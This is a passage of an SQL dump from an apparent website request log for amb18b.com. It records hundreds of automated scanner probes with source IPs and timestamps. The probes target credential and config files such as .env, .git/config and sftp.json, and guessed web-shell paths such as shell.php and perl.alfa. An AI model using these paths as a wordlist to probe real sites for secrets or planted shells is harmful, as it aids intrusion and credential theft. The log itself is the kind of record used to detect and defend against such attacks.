19:18:57'),(2441,'https://amb18b.com/135.php','4.230.40.160','Direct Access',1,'2025-10-28 19:18:58','2025-10-28 19:18:58'),(2442,'https://amb18b.com/enclas.php','4.230.40.160','Direct Access',1,'2025-10-28 19:19:00','2025-10-28 19:19:00'),(2443,'https://amb18b.com/ioxi-o.php','4.230.40.160','Direct Access',1,'2025-10-28 19:19:01','2025-10-28 19:19:01'),(2444,'https://amb18b.com/wp-admin/js/wp-conflg.php?p=','4.230.40.160','Direct Access',1,'2025-10-28 19:19:02','2025-10-28 19:19:02'),(2445,'https://amb18b.com/classwithtostring.php','4.230.40.160','Direct Access',1,'2025-10-28 19:19:03','2025-10-28 19:19:03'),(2446,'https://amb18b.com/image.php','4.230.40.160','Direct Access',1,'2025-10-28 19:19:04','2025-10-28 19:19:04'),(2447,'https://amb18b.com/wp-admin/wp-conflg.php?p=','4.230.40.160','Direct Access',1,'2025-10-28 19:19:06','2025-10-28 19:19:06'),(2448,'https://amb18b.com/mail.php?','4.230.40.160','Direct Access',1,'2025-10-28 19:19:07','2025-10-28 19:19:07'),(2449,'https://amb18b.com/sx.php','4.230.40.160','Direct Access',1,'2025-10-28 19:19:08','2025-10-28 19:19:08'),(2450,'https://amb18b.com/max.php','4.230.40.160','Direct Access',1,'2025-10-28 19:19:09','2025-10-28 19:19:09'),(2451,'https://amb18b.com/size.php?p=','4.230.40.160','Direct Access',1,'2025-10-28 19:19:11','2025-10-28 19:19:11'),(2452,'https://amb18b.com/mpxct.php','4.230.40.160','Direct Access',1,'2025-10-28 19:19:12','2025-10-28 19:19:12'),(2453,'https://amb18b.com/manager/assets/modext/core/modx.js','95.28.134.159','Direct Access',1,'2025-10-28 19:49:20','2025-10-28 19:49:20'),(2454,'https://amb18b.com/manager/media/script/mootools/mootools.js','89.207.69.121','Direct Access',1,'2025-10-28 19:54:21','2025-10-28 19:54:21'),(2455,'https://amb18b.com/manager/media/script/mootools/mootools.js','31.134.187.204','Direct Access',1,'2025-10-28 19:56:27','2025-10-28 19:56:27'),(2456,'https://amb18b.com/manager/media/script/mootools/mootools.js','94.137.227.201','Direct Access',1,'2025-10-28 19:58:08','2025-10-28 19:58:08'),(2457,'https://amb18b.com/wordpress','20.22.194.228','Direct Access',1,'2025-10-28 20:05:25','2025-10-28 20:05:25'),(2458,'https://amb18b.com/wp','20.22.194.228','Direct Access',1,'2025-10-28 20:05:29','2025-10-28 20:05:29'),(2459,'https://amb18b.com/bc','20.22.194.228','Direct Access',1,'2025-10-28 20:05:30','2025-10-28 20:05:30'),(2460,'https://amb18b.com/bk','20.22.194.228','Direct Access',1,'2025-10-28 20:05:32','2025-10-28 20:05:32'),(2461,'https://amb18b.com/backup','20.22.194.228','Direct Access',1,'2025-10-28 20:05:34','2025-10-28 20:05:34'),(2462,'https://amb18b.com/old','20.22.194.228','Direct Access',1,'2025-10-28 20:05:35','2025-10-28 20:05:35'),(2463,'https://amb18b.com/new','20.22.194.228','Direct Access',1,'2025-10-28 20:05:37','2025-10-28 20:05:37'),(2464,'https://amb18b.com/main','20.22.194.228','Direct Access',1,'2025-10-28 20:05:38','2025-10-28 20:05:38'),(2465,'https://amb18b.com/?p=1','217.113.194.200','Direct Access',1,'2025-10-28 22:27:48','2025-10-28 22:27:48'),(2466,'https://amb18b.com/%E0%B9%82%E0%B8%9B%E0%B8%A3%E0%B9%82%E0%B8%A1%E0%B8%8A%E0%B8%B1%E0%B9%88%E0%B8%99/','217.113.194.254','Direct Access',1,'2025-10-28 22:30:46','2025-10-28 22:30:46'),(2467,'https://amb18b.com/.env','195.250.21.212','Direct Access',1,'2025-10-29 00:00:45','2025-10-29 00:00:45'),(2468,'https://amb18b.com/account/.env','195.250.21.212','Direct Access',1,'2025-10-29 00:00:46','2025-10-29 00:00:46'),(2469,'https://amb18b.com/new/.env','195.250.21.212','Direct Access',1,'2025-10-29 00:00:46','2025-10-29 00:00:46'),(2470,'https://amb18b.com/admin/.env','195.250.21.212','Direct Access',1,'2025-10-29 00:00:46','2025-10-29 00:00:46'),(2471,'https://amb18b.com/backend/.env','195.250.21.212','Direct Access',1,'2025-10-29 00:00:47','2025-10-29 00:00:47'),(2472,'https://amb18b.com/dash/.env','195.250.21.212','Direct Access',1,'2025-10-29 00:00:47','2025-10-29 00:00:47'),(2473,'https://amb18b.com/laravel/.env','195.250.21.212','Direct Access',1,'2025-10-29 00:00:47','2025-10-29 00:00:47'),(2474,'https://amb18b.com/graphql','139.59.143.102','Direct Access',1,'2025-10-29 01:17:05','2025-10-29 01:17:05'),(2475,'https://amb18b.com/api','139.59.143.102','Direct Access',1,'2025-10-29 01:17:06','2025-10-29 01:17:06'),(2476,'https://amb18b.com/api/graphql','139.59.143.102','Direct Access',1,'2025-10-29 01:17:07','2025-10-29 01:17:07'),(2477,'https://amb18b.com/graphql/api','139.59.143.102','Direct Access',1,'2025-10-29 01:17:08','2025-10-29 01:17:08'),(2478,'https://amb18b.com/api/gql','139.59.143.102','Direct Access',1,'2025-10-29 01:17:09','2025-10-29 01:17:09'),(2479,'https://amb18b.com/swagger-ui.html','139.59.143.102','Direct Access',1,'2025-10-29 01:17:10','2025-10-29 01:17:10'),(2480,'https://amb18b.com/swagger/index.html','139.59.143.102','Direct Access',1,'2025-10-29 01:17:11','2025-10-29 01:17:11'),(2481,'https://amb18b.com/swagger/swagger-ui.html','139.59.143.102','Direct Access',1,'2025-10-29 01:17:12','2025-10-29 01:17:12'),(2482,'https://amb18b.com/webjars/swagger-ui/index.html','139.59.143.102','Direct Access',1,'2025-10-29 01:17:14','2025-10-29 01:17:14'),(2483,'https://amb18b.com/swagger.json','139.59.143.102','Direct Access',1,'2025-10-29 01:17:15','2025-10-29 01:17:15'),(2484,'https://amb18b.com/swagger/v1/swagger.json','139.59.143.102','Direct Access',1,'2025-10-29 01:17:16','2025-10-29 01:17:16'),(2485,'https://amb18b.com/v2/api-docs','139.59.143.102','Direct Access',1,'2025-10-29 01:17:17','2025-10-29 01:17:17'),(2486,'https://amb18b.com/v3/api-docs','139.59.143.102','Direct Access',1,'2025-10-29 01:17:18','2025-10-29 01:17:18'),(2487,'https://amb18b.com/api-docs/swagger.json','139.59.143.102','Direct Access',1,'2025-10-29 01:17:19','2025-10-29 01:17:19'),(2488,'https://amb18b.com/@vite/env','139.59.143.102','Direct Access',1,'2025-10-29 01:17:20','2025-10-29 01:17:20'),(2489,'https://amb18b.com/actuator/env','139.59.143.102','Direct Access',1,'2025-10-29 01:17:21','2025-10-29 01:17:21'),(2490,'https://amb18b.com/server','139.59.143.102','Direct Access',1,'2025-10-29 01:17:22','2025-10-29 01:17:22'),(2491,'https://amb18b.com/.vscode/sftp.json','139.59.143.102','Direct Access',1,'2025-10-29 01:17:23','2025-10-29 01:17:23'),(2492,'https://amb18b.com/about','139.59.143.102','Direct Access',1,'2025-10-29 01:17:25','2025-10-29 01:17:25'),(2493,'https://amb18b.com/debug/default/view?panel=config','139.59.143.102','Direct Access',1,'2025-10-29 01:17:26','2025-10-29 01:17:26'),(2494,'https://amb18b.com/v2/_catalog','139.59.143.102','Direct Access',1,'2025-10-29 01:17:27','2025-10-29 01:17:27'),(2495,'https://amb18b.com/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application','139.59.143.102','Direct Access',1,'2025-10-29 01:17:28','2025-10-29 01:17:28'),(2496,'https://amb18b.com/server-status','139.59.143.102','Direct Access',1,'2025-10-29 01:17:29','2025-10-29 01:17:29'),(2497,'https://amb18b.com/login.action','139.59.143.102','Direct Access',1,'2025-10-29 01:17:31','2025-10-29 01:17:31'),(2498,'https://amb18b.com/_all_dbs','139.59.143.102','Direct Access',1,'2025-10-29 01:17:32','2025-10-29 01:17:32'),(2499,'https://amb18b.com/.DS_Store','139.59.143.102','Direct Access',1,'2025-10-29 01:17:34','2025-10-29 01:17:34'),(2500,'https://amb18b.com/.env','139.59.143.102','Direct Access',1,'2025-10-29 01:17:35','2025-10-29 01:17:35'),(2501,'https://amb18b.com/.git/config','139.59.143.102','Direct Access',1,'2025-10-29 01:17:36','2025-10-29 01:17:36'),(2502,'https://amb18b.com/s/7383e2934313e27363e2237313/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties','139.59.143.102','Direct Access',1,'2025-10-29 01:17:38','2025-10-29 01:17:38'),(2503,'https://amb18b.com/config.json','139.59.143.102','Direct Access',1,'2025-10-29 01:17:39','2025-10-29 01:17:39'),(2504,'https://amb18b.com/telescope/requests','139.59.143.102','Direct Access',1,'2025-10-29 01:17:40','2025-10-29 01:17:40'),(2505,'https://amb18b.com/info.php','139.59.143.102','Direct Access',1,'2025-10-29 01:17:42','2025-10-29 01:17:42'),(2506,'https://amb18b.com//wp-includes/wlwmanifest.xml','62.60.131.156','Direct Access',1,'2025-10-29 08:36:29','2025-10-29 08:36:29'),(2507,'https://amb18b.com//?author=2','62.60.131.156','Direct Access',1,'2025-10-29 08:36:31','2025-10-29 08:36:31'),(2508,'https://amb18b.com/extractes_wordprees/filemanger/index.php','2a05:d01c:9d0:a700:4353:8f8f:2136:53cd','Direct Access',1,'2025-10-29 09:07:54','2025-10-29 09:07:54'),(2509,'https://amb18b.com/rest','83.219.234.112','Direct Access',1,'2025-10-29 09:16:33','2025-10-29 09:16:33'),(2510,'https://amb18b.com/tiny.php','217.150.75.56','Direct Access',1,'2025-10-29 09:24:51','2025-10-29 09:24:51'),(2511,'https://amb18b.com/jqueryfileupload/server/php/index.php?file=tf2rghf.jpg','37.49.148.167','Direct Access',1,'2025-10-29 14:49:35','2025-10-29 14:49:35'),(2512,'https://amb18b.com/sitemaps.xml','40.77.167.72','Direct Access',1,'2025-10-29 18:07:07','2025-10-29 18:07:07'),(2513,'https://amb18b.com/sitemaps.xml','40.77.167.12','Direct Access',1,'2025-10-29 19:09:44','2025-10-29 19:09:44'),(2514,'https://amb18b.com/.env','2a14:7c1::2','Direct Access',1,'2025-10-29 23:41:21','2025-10-29 23:41:21'),(2515,'https://amb18b.com/style.php','193.36.224.250','Direct Access',1,'2025-10-30 01:26:50','2025-10-30 01:26:50'),(2516,'https://amb18b.com/wp-admin/style.php','193.36.224.105','Direct Access',1,'2025-10-30 01:26:59','2025-10-30 01:26:59'),(2517,'https://amb18b.com/wp-includes/style.php','216.24.219.176','Direct Access',1,'2025-10-30 01:27:01','2025-10-30 01:27:01'),(2518,'https://amb18b.com/chosen.php?p=','193.36.224.147','Direct Access',1,'2025-10-30 01:27:03','2025-10-30 01:27:03'),(2519,'https://amb18b.com/file.php','193.36.224.229','Direct Access',1,'2025-10-30 01:27:05','2025-10-30 01:27:05'),(2520,'https://amb18b.com/flower.php','104.234.19.29','Direct Access',1,'2025-10-30 01:27:08','2025-10-30 01:27:08'),(2521,'https://amb18b.com/gifclass.php','193.36.224.240','Direct Access',1,'2025-10-30 01:27:09','2025-10-30 01:27:09'),(2522,'https://amb18b.com/bless.php','216.24.219.175','Direct Access',1,'2025-10-30 01:27:12','2025-10-30 01:27:12'),(2523,'https://amb18b.com/class-t.api.php','193.36.224.224','Direct Access',1,'2025-10-30 01:27:14','2025-10-30 01:27:14'),(2524,'https://amb18b.com/blurbs.php','104.234.19.30','Direct Access',1,'2025-10-30 01:27:16','2025-10-30 01:27:16'),(2525,'https://amb18b.com/akcc.php','216.24.219.175','Direct Access',1,'2025-10-30 01:27:18','2025-10-30 01:27:18'),(2526,'https://amb18b.com/abcd.php','193.36.224.250','Direct Access',1,'2025-10-30 01:27:20','2025-10-30 01:27:20'),(2527,'https://amb18b.com/shelp.php','104.234.19.28','Direct Access',1,'2025-10-30 01:27:23','2025-10-30 01:27:23'),(2528,'https://amb18b.com/cord.php','193.36.224.240','Direct Access',1,'2025-10-30 01:27:25','2025-10-30 01:27:25'),(2529,'https://amb18b.com/dex.php','193.36.224.241','Direct Access',1,'2025-10-30 01:27:27','2025-10-30 01:27:27'),(2530,'https://amb18b.com/file2.php','104.234.19.30','Direct Access',1,'2025-10-30 01:27:30','2025-10-30 01:27:30'),(2531,'https://amb18b.com//zwso.php','193.36.224.248','Direct Access',1,'2025-10-30 01:27:32','2025-10-30 01:27:32'),(2532,'https://amb18b.com/wp-admin/zwso.php','193.36.224.240','Direct Access',1,'2025-10-30 01:27:35','2025-10-30 01:27:35'),(2533,'https://amb18b.com/bolt.php','216.24.219.176','Direct Access',1,'2025-10-30 01:27:39','2025-10-30 01:27:39'),(2534,'https://amb18b.com/shlo.php','104.234.19.29','Direct Access',1,'2025-10-30 01:27:42','2025-10-30 01:27:42'),(2535,'https://amb18b.com/133.php','193.36.224.26','Direct Access',1,'2025-10-30 01:27:44','2025-10-30 01:27:44'),(2536,'https://amb18b.com/ahax.php','104.234.19.28','Direct Access',1,'2025-10-30 01:27:46','2025-10-30 01:27:46'),(2537,'https://amb18b.com/php8.php','193.36.224.233','Direct Access',1,'2025-10-30 01:27:48','2025-10-30 01:27:48'),(2538,'https://amb18b.com/lufix1.php','193.36.224.236','Direct Access',1,'2025-10-30 01:27:50','2025-10-30 01:27:50'),(2539,'https://amb18b.com/witmm.php','193.36.224.105','Direct Access',1,'2025-10-30 01:27:52','2025-10-30 01:27:52'),(2540,'https://amb18b.com/wp-admin/css/index.php','104.234.19.34','Direct Access',1,'2025-10-30 01:27:54','2025-10-30 01:27:54'),(2541,'https://amb18b.com/files.php','104.234.19.36','Direct Access',1,'2025-10-30 01:27:57','2025-10-30 01:27:57'),(2542,'https://amb18b.com/wp-editor.php','104.234.19.34','Direct Access',1,'2025-10-30 01:27:59','2025-10-30 01:27:59'),(2543,'https://amb18b.com/wp-confiq.php','196.251.115.137','Invalid Referrer',1,'2025-10-30 05:44:38','2025-10-30 05:44:38'),(2544,'https://amb18b.com/shoha.php','20.18.64.97','Direct Access',1,'2025-10-30 11:32:51','2025-10-30 11:32:51'),(2545,'https://amb18b.com/atomlib.php','20.18.64.97','Direct Access',1,'2025-10-30 11:32:52','2025-10-30 11:32:52'),(2546,'https://amb18b.com/cong.php','20.18.64.97','Direct Access',1,'2025-10-30 11:32:53','2025-10-30 11:32:53'),(2547,'https://amb18b.com/g.php','20.18.64.97','Direct Access',1,'2025-10-30 11:32:54','2025-10-30 11:32:54'),(2548,'https://amb18b.com/log.php','20.18.64.97','Direct Access',1,'2025-10-30 11:32:56','2025-10-30 11:32:56'),(2549,'https://amb18b.com/1index.php','20.18.64.97','Direct Access',1,'2025-10-30 11:32:57','2025-10-30 11:32:57'),(2550,'https://amb18b.com/fmk.php','20.18.64.97','Direct Access',1,'2025-10-30 11:32:58','2025-10-30 11:32:58'),(2551,'https://amb18b.com/xl2023.php','20.18.64.97','Direct Access',1,'2025-10-30 11:33:00','2025-10-30 11:33:00'),(2552,'https://amb18b.com/new.php','20.18.64.97','Direct Access',1,'2025-10-30 11:33:01','2025-10-30 11:33:01'),(2553,'https://amb18b.com/AxAo.php','20.18.64.97','Direct Access',1,'2025-10-30 11:33:02','2025-10-30 11:33:02'),(2554,'https://amb18b.com/chosen.php','20.18.64.97','Direct Access',1,'2025-10-30 11:33:04','2025-10-30 11:33:04'),(2555,'https://amb18b.com/update/f35.php','20.18.64.97','Direct Access',1,'2025-10-30 11:33:05','2025-10-30 11:33:05'),(2556,'https://amb18b.com/.well-known/pki-validation/dropdown.php','20.18.64.97','Direct Access',1,'2025-10-30 11:33:06','2025-10-30 11:33:06'),(2557,'https://amb18b.com/v3.php','20.18.64.97','Direct Access',1,'2025-10-30 11:33:08','2025-10-30 11:33:08'),(2558,'https://amb18b.com/sto.php','20.18.64.97','Direct Access',1,'2025-10-30 11:33:09','2025-10-30 11:33:09'),(2559,'https://amb18b.com/bless.php','20.18.64.97','Direct Access',1,'2025-10-30 11:33:11','2025-10-30 11:33:11'),(2560,'https://amb18b.com/wp-2019.php','20.18.64.97','Direct Access',1,'2025-10-30 11:33:12','2025-10-30 11:33:12'),(2561,'https://amb18b.com/.well-known/log.php','20.18.64.97','Direct Access',1,'2025-10-30 11:33:13','2025-10-30 11:33:13'),(2562,'https://amb18b.com/zhidagen.php','20.18.64.97','Direct Access',1,'2025-10-30 11:33:14','2025-10-30 11:33:14'),(2563,'https://amb18b.com/bb2.php','20.18.64.97','Direct Access',1,'2025-10-30 11:33:15','2025-10-30 11:33:15'),(2564,'https://amb18b.com/nc.php','20.18.64.97','Direct Access',1,'2025-10-30 11:33:17','2025-10-30 11:33:17'),(2565,'https://amb18b.com/er8.php','20.18.64.97','Direct Access',1,'2025-10-30 11:33:18','2025-10-30 11:33:18'),(2566,'https://amb18b.com/file2.php','20.18.64.97','Direct Access',1,'2025-10-30 11:33:19','2025-10-30 11:33:19'),(2567,'https://amb18b.com/wp-head.php','20.18.64.97','Direct Access',1,'2025-10-30 11:33:21','2025-10-30 11:33:21'),(2568,'https://amb18b.com/uploadx.php','20.18.64.97','Direct Access',1,'2025-10-30 11:33:22','2025-10-30 11:33:22'),(2569,'https://amb18b.com/nl.php','20.18.64.97','Direct Access',1,'2025-10-30 11:33:23','2025-10-30 11:33:23'),(2570,'https://amb18b.com/bless2.php','20.18.64.97','Direct Access',1,'2025-10-30 11:33:24','2025-10-30 11:33:24'),(2571,'https://amb18b.com/menu.php','20.18.64.97','Direct Access',1,'2025-10-30 11:33:25','2025-10-30 11:33:25'),(2572,'https://amb18b.com/okxoby.php','20.18.64.97','Direct Access',1,'2025-10-30 11:33:27','2025-10-30 11:33:27'),(2573,'https://amb18b.com/filesss.php','20.18.64.97','Direct Access',1,'2025-10-30 11:33:28','2025-10-30 11:33:28'),(2574,'https://amb18b.com/af4.php','20.18.64.97','Direct Access',1,'2025-10-30 11:33:29','2025-10-30 11:33:29'),(2575,'https://amb18b.com/about.php','20.18.64.97','Direct Access',1,'2025-10-30 11:33:30','2025-10-30 11:33:30'),(2576,'https://amb18b.com/wp-admin/js/about.php','20.18.64.97','Direct Access',1,'2025-10-30 11:33:32','2025-10-30 11:33:32'),(2577,'https://amb18b.com/.bod/.ll/ss.php','20.18.64.97','Direct Access',1,'2025-10-30 11:33:33','2025-10-30 11:33:33'),(2578,'https://amb18b.com/555.php','20.18.64.97','Direct Access',1,'2025-10-30 11:33:34','2025-10-30 11:33:34'),(2579,'https://amb18b.com/gdn.php','20.18.64.97','Direct Access',1,'2025-10-30 11:33:36','2025-10-30 11:33:36'),(2580,'https://amb18b.com/class17.php','20.18.64.97','Direct Access',1,'2025-10-30 11:33:37','2025-10-30 11:33:37'),(2581,'https://amb18b.com/class.php','20.18.64.97','Direct Access',1,'2025-10-30 11:33:38','2025-10-30 11:33:38'),(2582,'https://amb18b.com/222.php','20.18.64.97','Direct Access',1,'2025-10-30 11:33:40','2025-10-30 11:33:40'),(2583,'https://amb18b.com/wp.php','20.18.64.97','Direct Access',1,'2025-10-30 11:33:42','2025-10-30 11:33:42'),(2584,'https://amb18b.com/makeasmtp.php','20.18.64.97','Direct Access',1,'2025-10-30 11:33:43','2025-10-30 11:33:43'),(2585,'https://amb18b.com/radio.php','20.18.64.97','Direct Access',1,'2025-10-30 11:33:44','2025-10-30 11:33:44'),(2586,'https://amb18b.com/manager.php','20.18.64.97','Direct Access',1,'2025-10-30 11:33:45','2025-10-30 11:33:45'),(2587,'https://amb18b.com/we2.php','20.18.64.97','Direct Access',1,'2025-10-30 11:33:47','2025-10-30 11:33:47'),(2588,'https://amb18b.com/wp-includes/IXR/about.php','20.18.64.97','Direct Access',1,'2025-10-30 11:33:48','2025-10-30 11:33:48'),(2589,'https://amb18b.com/mar.php','20.18.64.97','Direct Access',1,'2025-10-30 11:33:49','2025-10-30 11:33:49'),(2590,'https://amb18b.com/lv.php','20.18.64.97','Direct Access',1,'2025-10-30 11:33:51','2025-10-30 11:33:51'),(2591,'https://amb18b.com/mail.php','20.18.64.97','Direct Access',1,'2025-10-30 11:33:52','2025-10-30 11:33:52'),(2592,'https://amb18b.com/aipoyp.php','20.18.64.97','Direct Access',1,'2025-10-30 11:33:55','2025-10-30 11:33:55'),(2593,'https://amb18b.com/db.php','20.18.64.97','Direct Access',1,'2025-10-30 11:33:56','2025-10-30 11:33:56'),(2594,'https://amb18b.com/m.php','20.18.64.97','Direct Access',1,'2025-10-30 11:33:57','2025-10-30 11:33:57'),(2595,'https://amb18b.com/up.php','20.18.64.97','Direct Access',1,'2025-10-30 11:33:58','2025-10-30 11:33:58'),(2596,'https://amb18b.com/dfre.php','20.18.64.97','Direct Access',1,'2025-10-30 11:33:59','2025-10-30 11:33:59'),(2597,'https://amb18b.com/men.php','20.18.64.97','Direct Access',1,'2025-10-30 11:34:01','2025-10-30 11:34:01'),(2598,'https://amb18b.com/media.php','20.18.64.97','Direct Access',1,'2025-10-30 11:34:02','2025-10-30 11:34:02'),(2599,'https://amb18b.com/uplozyu.php','20.18.64.97','Direct Access',1,'2025-10-30 11:34:05','2025-10-30 11:34:05'),(2600,'https://amb18b.com/wp-includes/Text/wp-conflg.php','20.18.64.97','Direct Access',1,'2025-10-30 11:34:06','2025-10-30 11:34:06'),(2601,'https://amb18b.com/shell.php','20.18.64.97','Direct Access',1,'2025-10-30 11:34:07','2025-10-30 11:34:07'),(2602,'https://amb18b.com/system.php','20.18.64.97','Direct Access',1,'2025-10-30 11:34:08','2025-10-30 11:34:08'),(2603,'https://amb18b.com/num.php','20.18.64.97','Direct Access',1,'2025-10-30 11:34:10','2025-10-30 11:34:10'),(2604,'https://amb18b.com/zc-749.php','20.18.64.97','Direct Access',1,'2025-10-30 11:34:11','2025-10-30 11:34:11'),(2605,'https://amb18b.com/bala.php','20.18.64.97','Direct Access',1,'2025-10-30 11:34:12','2025-10-30 11:34:12'),(2606,'https://amb18b.com/item.php','20.18.64.97','Direct Access',1,'2025-10-30 11:34:13','2025-10-30 11:34:13'),(2607,'https://amb18b.com/000.php','20.18.64.97','Direct Access',1,'2025-10-30 11:34:15','2025-10-30 11:34:15'),(2608,'https://amb18b.com/file22.php','20.18.64.97','Direct Access',1,'2025-10-30 11:34:16','2025-10-30 11:34:16'),(2609,'https://amb18b.com/jf1d22.php','20.18.64.97','Direct Access',1,'2025-10-30 11:34:17','2025-10-30 11:34:17'),(2610,'https://amb18b.com/asd67.php','20.18.64.97','Direct Access',1,'2025-10-30 11:34:18','2025-10-30 11:34:18'),(2611,'https://amb18b.com/Okxob.php','20.18.64.97','Direct Access',1,'2025-10-30 11:34:20','2025-10-30 11:34:20'),(2612,'https://amb18b.com/mah.php','20.18.64.97','Direct Access',1,'2025-10-30 11:34:22','2025-10-30 11:34:22'),(2613,'https://amb18b.com/goat1.php','20.18.64.97','Direct Access',1,'2025-10-30 11:34:23','2025-10-30 11:34:23'),(2614,'https://amb18b.com/naxc.php','20.18.64.97','Direct Access',1,'2025-10-30 11:34:24','2025-10-30 11:34:24'),(2615,'https://amb18b.com/lock360.php','20.18.64.97','Direct Access',1,'2025-10-30 11:34:25','2025-10-30 11:34:25'),(2616,'https://amb18b.com/ini.php','20.18.64.97','Direct Access',1,'2025-10-30 11:34:26','2025-10-30 11:34:26'),(2617,'https://amb18b.com/uploat.php','20.18.64.97','Direct Access',1,'2025-10-30 11:34:27','2025-10-30 11:34:27'),(2618,'https://amb18b.com/wp-includes/style-engine/index.php','20.18.64.97','Direct Access',1,'2025-10-30 11:34:29','2025-10-30 11:34:29'),(2619,'https://amb18b.com/wp-configs.php','20.18.64.97','Direct Access',1,'2025-10-30 11:34:30','2025-10-30 11:34:30'),(2620,'https://amb18b.com/zc-903.php','20.18.64.97','Direct Access',1,'2025-10-30 11:34:31','2025-10-30 11:34:31'),(2621,'https://amb18b.com/about/function.php','20.18.64.97','Direct Access',1,'2025-10-30 11:34:33','2025-10-30 11:34:33'),(2622,'https://amb18b.com/wp-admin/log.php','20.18.64.97','Direct Access',1,'2025-10-30 11:34:34','2025-10-30 11:34:34'),(2623,'https://amb18b.com/oxvrws.php','20.18.64.97','Direct Access',1,'2025-10-30 11:34:36','2025-10-30 11:34:36'),(2624,'https://amb18b.com/we.php','20.18.64.97','Direct Access',1,'2025-10-30 11:34:37','2025-10-30 11:34:37'),(2625,'https://amb18b.com/02.php','20.18.64.97','Direct Access',1,'2025-10-30 11:34:38','2025-10-30 11:34:38'),(2626,'https://amb18b.com/system_log.php','20.18.64.97','Direct Access',1,'2025-10-30 11:34:39','2025-10-30 11:34:39'),(2627,'https://amb18b.com/CLA.php','20.18.64.97','Direct Access',1,'2025-10-30 11:34:40','2025-10-30 11:34:40'),(2628,'https://amb18b.com/sk25_1.php','20.18.64.97','Direct Access',1,'2025-10-30 11:34:42','2025-10-30 11:34:42'),(2629,'https://amb18b.com/autoload_classmap.php','20.18.64.97','Direct Access',1,'2025-10-30 11:34:43','2025-10-30 11:34:43'),(2630,'https://amb18b.com/css/xp.php','20.18.64.97','Direct Access',1,'2025-10-30 11:34:44','2025-10-30 11:34:44'),(2631,'https://amb18b.com/file21.php','20.18.64.97','Direct Access',1,'2025-10-30 11:34:46','2025-10-30 11:34:46'),(2632,'https://amb18b.com/himu.php','20.18.64.97','Direct Access',1,'2025-10-30 11:34:47','2025-10-30 11:34:47'),(2633,'https://amb18b.com/hn.php','20.18.64.97','Direct Access',1,'2025-10-30 11:34:48','2025-10-30 11:34:48'),(2634,'https://amb18b.com/as/function.php','20.18.64.97','Direct Access',1,'2025-10-30 11:34:50','2025-10-30 11:34:50'),(2635,'https://amb18b.com/flower.php','20.18.64.97','Direct Access',1,'2025-10-30 11:34:51','2025-10-30 11:34:51'),(2636,'https://amb18b.com/f35.php','20.18.64.97','Direct Access',1,'2025-10-30 11:34:52','2025-10-30 11:34:52'),(2637,'https://amb18b.com/doc.php','20.18.64.97','Direct Access',1,'2025-10-30 11:34:53','2025-10-30 11:34:53'),(2638,'https://amb18b.com/tentang_rmol.php','20.18.64.97','Direct Access',1,'2025-10-30 11:34:55','2025-10-30 11:34:55'),(2639,'https://amb18b.com/pass.php','20.18.64.97','Direct Access',1,'2025-10-30 11:34:56','2025-10-30 11:34:56'),(2640,'https://amb18b.com/classwithtostring.php','20.18.64.97','Direct Access',1,'2025-10-30 11:34:57','2025-10-30 11:34:57'),(2641,'https://amb18b.com/jp.php','20.18.64.97','Direct Access',1,'2025-10-30 11:34:58','2025-10-30 11:34:58'),(2642,'https://amb18b.com/cc.php','20.18.64.97','Direct Access',1,'2025-10-30 11:35:00','2025-10-30 11:35:00'),(2643,'https://amb18b.com//wp-includes/wlwmanifest.xml','34.53.110.196','Direct Access',1,'2025-10-30 14:05:47','2025-10-30 14:05:47'),(2644,'https://amb18b.com//?author=2','34.53.110.196','Direct Access',1,'2025-10-30 14:05:54','2025-10-30 14:05:54'),(2645,'https://amb18b.com//?author=3','34.53.110.196','Direct Access',1,'2025-10-30 14:05:56','2025-10-30 14:05:56'),(2646,'https://amb18b.com/sitemap.xml','196.251.81.111','Direct Access',1,'2025-10-30 14:48:48','2025-10-30 14:48:48'),(2647,'https://amb18b.com/uploaded_script.php','172.174.112.224','Invalid Referrer',1,'2025-10-30 16:34:33','2025-10-30 16:34:33'),(2648,'https://amb18b.com/uploaded_script.php','172.174.112.224','Invalid Referrer',1,'2025-10-30 16:34:38','2025-10-30 16:34:38'),(2649,'https://amb18b.com/ALFA_DATA/alfacgiapi/perl.alfa','4.216.91.190','Invalid Referrer',1,'2025-10-30 17:38:16','2025-10-30 17:38:16'),(2650,'https://amb18b.com/wp-plain.php','4.216.91.190','Invalid Referrer',1,'2025-10-30 17:38:16','2025-10-30 17:38:16'),(2651,'https://amb18b.com/','4.216.91.190','Invalid Referrer',2,'2025-10-30 17:38:26','2025-10-30 17:38:25'),(2652,'https://amb18b.com/plugins/content/apismtp/apismtp.php?test=hello','4.216.91.190','Direct Access',1,'2025-10-30 17:38:29','2025-10-30 17:38:29'),(2653,'https://amb18b.com/alfacgiapi/perl.alfa','4.216.91.190','Invalid Referrer',1,'2025-10-30 17:38:29','2025-10-30 17:38:29'),(2654,'https://amb18b.com/plugins/content/apismtp/apismtp.php.suspected?test=hello','4.216.91.190','Direct Access',1,'2025-10-30 17:38:32','2025-10-30 17:38:32'),(2655,'https://amb18b.com/m.php','20.234.109.99','Direct Access',1,'2025-10-30 18:00:03','2025-10-30 18:00:03'),(2656,'https://amb18b.com/admin.php','20.234.109.99','Direct Access',1,'2025-10-30 18:00:04','2025-10-30 18:00:04'),(2657,'https://amb18b.com/marijuana.php','20.234.109.99','Direct Access',1,'2025-10-30 18:00:07','2025-10-30 18:00:07'),(2658,'https://amb18b.com/modules/mod_simplefileuploadv1.3/elements/filemanager.php','20.234.109.99','Direct Access',1,'2025-10-30 18:00:09','2025-10-30 18:00:09'),(2659,'https://amb18b.com/readme.php','20.234.109.99','Direct Access',1,'2025-10-30 18:00:11','2025-10-30 18:00:11'),(2660,'https://amb18b.com/gmo.php','20.234.109.99','Direct Access',1,'2025-10-30 18:00:13','2025-10-30 18:00:13'),(2661,'https://amb18b.com/autoload_classmap.php','20.234.109.99','Direct Access',1,'2025-10-30 18:00:15','2025-10-30 18:00:15'),(2662,'https://amb18b.com/wp-includes/html-api/wp-conflg.php','20.234.109.99','Direct Access',1,'2025-10-30 18:00:17','2025-10-30 18:00:17'),(2663,'https://amb18b.com/nc4.php','20.234.109.99','Direct Access',1,'2025-10-30 18:00:21','2025-10-30 18:00:21'),(2664,'https://amb18b.com/g.php','20.234.109.99','Direct Access',1,'2025-10-30 18:00:25','2025-10-30 18:00:25'),(2665,'https://amb18b.com/13.php','20.234.109.99','Direct Access',1,'2025-10-30 18:00:27','2025-10-30 18:00:27'),(2666,'https://amb18b.com/wp-admin/maint/about.php','20.234.109.99','Direct Access',1,'2025-10-30 18:00:28','2025-10-30 18:00:28'),(2667,'https://amb18b.com/adminer.php','20.234.109.99','Direct Access',1,'2025-10-30 